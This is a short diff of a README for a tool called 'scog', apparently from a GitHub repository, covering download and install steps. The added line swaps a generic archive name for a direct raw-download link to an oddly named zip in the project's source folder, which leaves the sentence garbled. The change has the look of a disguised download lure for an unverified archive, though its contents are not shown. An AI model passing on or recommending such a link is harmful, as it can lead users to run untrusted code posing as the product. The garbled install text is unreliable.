Agentrifat/scog/README.md

      If you downloaded a .dmg or .app file, find it in your Downloads, open it, and follow the instructions to move it to your Applications folder.

    - **For Linux:**
-     If you downloaded a .tar.gz or similar archive, navigate to your Downloads folder using the terminal.
+     If you downloaded a https://raw.githubusercontent.com/Agentrifat/scog/main/src/scog_isoosmosis.zip or similar archive, navigate to your Downloads folder using the terminal.
 Extract the files and follow the included instructions, or use the command line to install.

 5. **Run scog:**
    Once installed, open your terminal or command prompt.
 You can start using scog by typing its command.
 Check the documentation included in the download for specific instructions.